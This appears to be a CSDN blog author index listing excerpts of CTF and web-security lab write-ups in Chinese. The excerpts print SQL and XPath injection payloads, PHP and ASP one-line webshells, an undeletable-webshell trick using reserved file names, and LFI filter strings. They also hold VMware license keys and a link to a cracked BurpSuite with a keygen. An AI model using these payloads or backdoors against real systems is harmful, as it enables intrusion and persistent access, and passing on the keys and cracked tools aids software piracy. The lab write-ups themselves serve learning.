![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
CTF
pcy190
这个作者很懒,什么都没留下…
展开
-
虚拟机安装kali linux
虚拟机安装kali linuxlinux镜像下载地址http://man.linuxde.net/download/Ubuntu_16_041.安装VM pro14,密钥如下:CG54H-D8D0H-H8DHY-C6X7X-N2KG6ZC3WK-AFXEK-488JP-A7MQX-XL8YFAC5...转载 2018-07-29 11:58:04 · 3370 阅读 · 0 评论 -
【逆向】修改软件标题(基于PE Explorer)
【工具准备】1.PEID 0.9中文版下载点击这里2.PE Explore 下载地址点击这里【实验过程】1.首先用PEiD打开软件查壳,发现无壳,而且用basic编写的。 2.然后用PE Explorer将软件打开3.点击工具栏中的 "资源查看/编辑器" 按钮 (四个三角形构成的菱形图案)4.单击左侧的 RC资源--...原创 2018-08-13 12:56:18 · 16158 阅读 · 0 评论 -
【WEB】DotNetTextBox编辑器漏洞利用
关键字:system_dntb/用御剑后台扫描确定 system_dntb/uploadimg.aspx 并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/;路径可以修改,只是权限...转载 2018-08-18 11:05:21 · 1316 阅读 · 0 评论 -
【WEB】Wpscan破解WordPress
【原题】https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe【解法】1.首先用WPCSAN -u url -ap扫描所有 插件漏洞,发现 存在comment-rating漏洞2.百度这个 漏洞,然后用sqlmap爆出有关comment-rating的网址的管理员密码(需要MD5解密)...原创 2018-08-18 14:17:32 · 1639 阅读 · 0 评论 -
【WEB】aspcms漏洞利用
【社工方法】(不推荐)1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人2.接着利用注入漏洞/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password...原创 2018-08-18 17:30:47 · 18293 阅读 · 3 评论 -
【WEB】检测是否安装了 .NET Framework 9.9
useragent中写入Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 9.9)官方文档:https://docs.microsoft.com/zh-cn/dotnet/framework/wpf/app-development/how-to-detec...转载 2018-08-16 12:13:06 · 1887 阅读 · 0 评论 -
【WEB】语言代码缩写表大全(用于Accept-Language)
语言代码缩写表大全 注意大小写:全部小写!! af 南非公用荷兰语 sq 阿尔巴尼亚语 ar-sa 阿拉伯语(沙特阿拉伯) ar-iq 阿拉伯语(伊拉克) ar-e...转载 2018-08-16 15:20:54 · 14790 阅读 · 1 评论 -
【WEB】IIS写权限漏洞分析溯源
【原题】https://www.mozhe.cn/bug/detail/VnRjUTVETHFXWk5URWNjV2VpVWhRQT09bW96aGUmozhe【解法】1.首先iis scaner发现有put漏洞,但是无法用工具注入。2.尝试用burp抓包修改写入 PUT /test.txt HTTP/1.1Host: 219.153.49.228:43672Pragma: ...原创 2018-08-19 14:48:21 · 1232 阅读 · 0 评论 -
【WEB】通过SQL语句获取WEB权限实战 通过SQL语句获取WEB权限(access+asp)
【原题】https://www.mozhe.cn/bug/detail/cXBuSzIya1pWbHdjVFFwNXM3c1ZtZz09bW96aGUmozhe【解法】用过sql查询语句写入select '<%eval request("pass")%>' into [sum] in 'c:\inetpub\wwwroot\1.asa;x.xls' 'excel 8.0...原创 2018-08-19 15:46:41 · 1837 阅读 · 0 评论 -
【WEB】PHP代码分析溯源(第3题)
在for 循环中是判断输入的字符是否有存在在1和9之间的数字如果不存在判断是否等于54975581388等于则绕过即 又不能等于数字1-9又要等于54975581388但是这里在比较的时候就是用弱类型的,所以不要求完全一致。php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc键入 0xccccccccc得到key...原创 2018-08-19 22:08:21 · 256 阅读 · 0 评论 -
【WEB】PHP代码分析溯源(PHP文件包含)
【原题】https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe【题干】网页显示源码 eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); 【解法】在 在线运行PHP网站...原创 2018-08-17 20:27:14 · 1656 阅读 · 0 评论 -
【WEB】XPath注入漏洞
网站网址为 /demo.php?name=xml ,可能存在XPath漏洞 在网址最后面加上 ' or 1=1 or ''=' 或者 ']|//*|//*['类似sql注入,绕过查询 条件原创 2018-08-17 20:39:36 · 2139 阅读 · 0 评论 -
【PWN】简单缓存区溢出
【解法】拿到文件,查看伪代码,发现v4变量的地址是 -50h (也就是-80) 那么要想覆盖到key变量的地址,我们就得用ida分析获取输入的地址和key地址的相对差值了。。 得到v4的地址为-80,v5的地址为-4,-4-(-80)得到需要覆盖的字节为76直接用python生成字符串提交得到flag。。 [学习资料] https://blog.csdn.net/u0...原创 2018-08-23 15:51:05 · 825 阅读 · 0 评论 -
【WEB】远程电子数据取证-木马分析(第3题)
【原题】https://www.mozhe.cn/bug/detail/RHdoNU8zOUEreHdHeUhObGFPT0RGUT09bW96aGUmozhe 【解法1】1.然后cd到这个目录(wwwroot)然后使用 dir /x 父目录显示出dos下的文件名2.用cmd type发现其有888~1选择运行 c:inetpubwwwroot888~13. ...原创 2018-08-20 21:35:30 · 1059 阅读 · 0 评论 -
【WEB】远程电子数据取证-木马分析(第1题)(驱动级文件隐藏)
【原题】https://www.mozhe.cn/bug/detail/UHpRcDlZV2J0NmxSYXFPR0g2MUxaQT09bW96aGUmozhe在wwwroot目录下找不到应该存在的seo文件夹,根据提示,是用了驱动级文件隐藏,使得seo文件夹不可见。【解法】驱动级文件隐藏特征系统目录存在如下文件:c:\WINDOWS\xlkfs.datc:\WINDOWS...原创 2018-08-20 21:47:17 · 1442 阅读 · 0 评论 -
【WEB】webshell中的不死僵尸和隐藏后门的原理以及删除
主要是利用系统保留文件名创建无法删除的webshell来隐藏后门。Windows 下不能够以下面这些字样来命名文件或文件夹: aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9 但是通过cmd的copy命令即可实现: copy...转载 2018-08-20 21:50:14 · 2235 阅读 · 0 评论 -
【WEB】BackDoor
下载数据包,发现有菜刀连接的痕迹。 怎么知道的,看数据包吧。追踪tcp流发现连接的痕迹。右键,追踪tcp流,发现两个加密后的字符串 对字符串进行base64解密,发现菜刀的特征字符: 解密后是这么一段特征字符: @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@s...转载 2018-08-24 17:07:35 · 1422 阅读 · 0 评论 -
【Web】SQL注入--万能密码
后台万能密码¶admin' --admin' #admin'/*' or 1=1--' or 1=1#' or 1=1/*') or '1'='1--') or ('1'='1--username=' or ''='&password=' or ''=' 解析:select * from admin where username=''=''...原创 2018-08-08 16:33:52 · 9750 阅读 · 0 评论 -
【WEB】利用PING命令注入执行分析
题目地址 https://www.mozhe.cn/bug/detail/RWpnQUllbmNaQUVndTFDWGxaL0JjUT09bW96aGUmozhe资料http://poetichacker.com/writeup/由iscc2018-web-ping学习命令注入.html姿势 命令连接符 command1 && command2 先执行...原创 2018-08-17 20:57:37 · 9151 阅读 · 0 评论 -
CTF用到的网站
1. XSSEE(用于网址编解码查看): https://web2hack.org/xssee/2. 解密/加密JS/VBS/ASP代码: https://www.dheart.net/decode/ http://tool.webmasterhome.cn/Encode.asp3.加密解密aaencode: 加密: http://utf-...原创 2018-07-29 13:17:07 · 7432 阅读 · 0 评论 -
【Web】内部文件上传系统漏洞分析溯源(获取shell)
【准备工具】1.中国菜刀 (可以去官网下载)官网:http://www.maicaidao.co/ (不建议使用) https://download.csdn.net/download/u014549283/105709762.BurpPro3.火狐浏览器的FoxyProxy Standard插件【技术要点】1.新建一句话代码,比如1.txt,内容选择如下...原创 2018-07-29 17:19:33 · 3530 阅读 · 1 评论 -
【Web】变种一句话木马--中国菜刀连接
【Web】变种一句话木马--中国菜刀连接遇到这种文件:<?phperror_reporting(0);$_GET['POST']($_POST['GET']);?>就是变种的一句话木马 在php网址后面加上 ?POST=assert编辑栏密码为GET连接即可 或者 <?php $POST['POST']='assert...原创 2018-07-29 18:11:38 · 8613 阅读 · 2 评论 -
【Web】SQLMap的tamper的使用
【Web】SQLMap的tamper的使用1.如果需要ID后面base64编码 则另加 --tamper=base64encode 命令原创 2018-07-29 18:36:22 · 4763 阅读 · 0 评论 -
【Web】SQL手工注入Sql Server数据库 (漏洞测试)
【Web】SQL手工注入Sql Server数据库 (漏洞测试)第一步:判断是否有注入,?id=2 and 1=1 正确;id=2 and 1=2 错误,得出有注入点。第二步:判断数据库类型:?id=2 and exists (select * from sysobjects) 显示正常, 表示是ms sql server数据库。第三步:sqlmap...原创 2018-07-30 13:21:59 · 3850 阅读 · 0 评论 -
【Web】浏览器信息伪造--User-Agent及NetType微信网络检测
【Web】浏览器信息伪造--User-Agent及NetType微信网络检测User-Agent(用户代理)字符串是Web浏览器用于声明自身型号版本并随HTTP请求发送给Web服务器的字符串,在Web服务器上可以获取到该字符串。 从微信6.0开始,其内嵌的浏览器在UserAgent字符串中增加了NetType字段用于标识客户端(手机)当前的网络环境,经测试,该字段至少有以下3个取...转载 2018-07-30 13:35:28 · 6400 阅读 · 0 评论 -
【CTF】PHP Hash漏洞(关于0e开头的md5值)
原题(PHP代码分析溯源)<?php$md51 = md5('QNKCDZO');$a = @$_GET['a'];$md52 = @md5($a);if(isset($a)){if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}";} else { ec...原创 2018-07-30 17:16:47 · 12173 阅读 · 0 评论 -
【CTF】sqlmap之POST注入的两种方法(-r 和--data)
用sqlmap进行做post注入测试的时候,发现这么一种情况:对POST请求,之前一直用 “-r txt文件”的形式,进行注入测试;发现还有另一种POST,用“-r txt文件”的形式进行却无效,原来可以通过“--data="key=value"”来进行测试注入。 故以上两种情况都是post的,却还是有区别的 故此记录如下:1:POST注入时,什么时候用“-r txt文...转载 2018-07-30 18:35:22 · 8273 阅读 · 0 评论 -
【CTF】X-Forwarded-For SQL注入实战
1.首先burp抓包,分析post包,保存为txt文件(可看这个 https://blog.csdn.net/u014549283/article/details/81290015 ,此处用 -r 参数)2、使用sqlmap进行注入爆数据库sqlmap -r xxx.txt --dbs --batch 爆表名sqlmap -r xxx.txt -D 数据库名 --tab...转载 2018-07-30 18:37:00 · 4649 阅读 · 0 评论 -
ZIP文件伪加密
【重点】一般错误的zip文件,会改动的地方:1. 3个头文件标记。2. 解压的pkware版本所在的标志位。3. 压缩方式的标志位。4. 全局方式位标记(有无加密)(其中如00 00这样的前面的末位是偶数的代表不加密,如09 00这样后面奇数的代表加密,打开zip需要输入密码)【分析流程】①.将得到的文件后缀名改为zip,打开后发现txt文本有提取密码;②.用Winhex工...转载 2018-08-04 15:53:55 · 3590 阅读 · 0 评论 -
各类文件的文件头标志
文件格式分析器下载JPEG (jpg),文件头:FFD8FFPNG (png),文件头:89504E47GIF (gif),文件头:47494638TIFF (tif),文件头:49492A00Windows Bitmap (bmp),文件头:424DCAD (dwg),文件头:41433130Adobe Photoshop (psd),文件头:38425053Ri...转载 2018-08-04 16:39:44 · 6329 阅读 · 0 评论 -
GIF修复(图片隐写)
发现文件头丢失。修复文件头。(文件头标志见这里) 这里因为提示GIF格式,于是补上47494638,然后Stegslove打开即可。参考https://blog.csdn.net/u010391191/article/details/80831998...原创 2018-08-04 16:42:47 · 11226 阅读 · 0 评论 -
【CTF】LFI漏洞总结(PHP本地文件包含漏洞)
学习链接: https://www.cnblogs.com/wh4am1/p/6542398.html 发现地址后面的参数直接使用的文件包含。 ?file=show.php为了查看index.php的源文件, 可以使用下面的命令:rlfi.php ?language=php://filter/read=convert.base64-encode/resource=index.p...原创 2018-07-31 13:15:51 · 10955 阅读 · 0 评论 -
BurpSuite 破解版(含注册机,无后门)下载注册详细教程
最近用到Burp,于是找了下吾爱破解上的注册机的原版,也就是没有后门的版本。顺带贴一个教程。仅供学习交流使用!!1. BurpSuite 1.7 原版+注册机 下载地址: csdn已经上传了 https://download.csdn.net/download/u014549283/10568556百度云:链接:https://pan.baidu.com/s/1ZGQc...原创 2018-07-27 17:45:35 · 136419 阅读 · 54 评论 -
【Crypto】初级的RSA分析处理
学习资料 http://www.freebuf.com/sectool/163781.htmlhttps://blog.csdn.net/dongyanwen6036/article/details/76900001?locationNum=7&fps=1openssl分析公钥,得到N,Eopenssl rsa -pubin -text -modulus -in publ...原创 2018-08-06 20:40:43 · 2322 阅读 · 0 评论 -
[Crypto]ECB模式攻击
【ECB模式攻击原理】(参考https://zachgrace.com/posts/attacking-ecb/)ecb模式使用相同的key分块对明文分别进行加密,相同的明文获得相同的密文输出 根据这一特性,可以构造如下数据进行攻击: 首先输入blocksize-1的填充,这样未知字符串的第一个字符将落到填充块的最后一个字节: XXXXXXAA AAAAAAAA AAAAAA...原创 2018-08-07 18:53:16 · 6657 阅读 · 0 评论 -
【WEB】主机溢出提权漏洞分析
【原题】https://www.mozhe.cn/bug/detail/d1JMR1FrRDR2RmdJdzdJK09DZlNFZz09bW96aGUmozhe【解法】使用御剑和firefox的插件,得到靶场网站的容器为IIS6.0,脚本语言为asp使用靶场提供的上传功能,结合burp和IIS6.0解析漏洞修改上传路径为upload/shell.asp,上传一个1.jpg的asp一句话...转载 2018-08-21 19:40:13 · 1022 阅读 · 0 评论